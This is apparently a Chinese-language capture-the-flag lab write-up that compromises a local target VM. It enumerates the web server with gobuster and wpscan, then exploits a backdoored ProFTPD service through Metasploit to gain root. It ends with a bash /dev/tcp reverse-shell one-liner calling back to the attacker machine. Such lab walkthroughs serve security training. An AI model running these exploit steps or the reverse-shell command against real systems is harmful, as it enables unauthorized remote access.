靶机ip:192.168.181.155
kali IP : 192.168.181.129
首先进行IP扫描
然后我查看ip端口开启哪些服务
我们看见他开启了80端口,于是我们打开网页进行查看
于是我进行目录探测,看看他有没有给我们一些提示
gobuster dir -u http://192.168.181.155/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
于是我认为他们开启了wordpress,于是我打开/wp-admin
发现他确实有wp,于是我使用wpscan进行查看
wpscan --url http://192.168.181.155/wp-content/ -e --api-token ************
好像不可以,于是我查看ip端口的协议是否有漏洞,当我查看第一个ftp时就发现有漏洞
有远程命令执行的漏洞,于是我进行查看
https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/
他告诉我漏洞利用过程
于是我打开msfconsole
use 0
show options
但是我们要增加一个payload
show payloads
于是进行添加
set payload cmd/unix/reverse
于是对靶机进行攻击
rhost 是攻击靶机的ip
lhost 是kali的ip
于是获得root权限
于是我将他反弹到kali
bash -c 'bash -i >& /dev/tcp/192.168.181.129/9001 0>&1'
于是才root目录下获得最终的flag